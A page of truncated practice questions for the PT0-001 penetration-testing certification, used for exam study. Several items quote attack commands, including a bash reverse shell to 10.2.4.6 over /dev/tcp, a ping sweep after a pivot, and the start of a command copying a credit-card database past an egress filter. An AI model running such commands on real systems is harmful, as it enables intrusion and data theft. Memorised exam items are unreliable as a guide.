PT0-001 Practice Questions

After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable. The Client claims to have be...

During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts t...

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Which of the following types of physical security attacks does a mantrap mitigate-?

A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Which of the following reasons does penetration tester needs to have a customer's point-of - contact information available at all time? (Select THREE).

While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the...

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to imp...

In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop following as a potential NEXT step to extract credentials from the device?

A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For whi...

A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter th...

A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adve...

Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to reme...

A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user acco...

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant t...

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company- provide text file that contain a list of IP addresses. Which of the following are needed...

Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. W...

Click the exhibit button. Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system?...

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?

A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was r...

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...

A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gatheri...

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the corre...

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Wh...

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m;...

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the follow...

Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration...

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The...

Given the following: Which of the following BEST describes the above attack?

A penetration tester, who is not on the client's network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the...

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimika...

Which of the following is the purpose of an NDA?

A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?

A penetration tester has been asked to conduct OS fingering with Nmap using a company- provided text file that contains a list of IP addresses. Which of the following are needed to...

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine...

A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consu...

A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following sol...

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command: c: \creditcards.db>c:\winit\system32...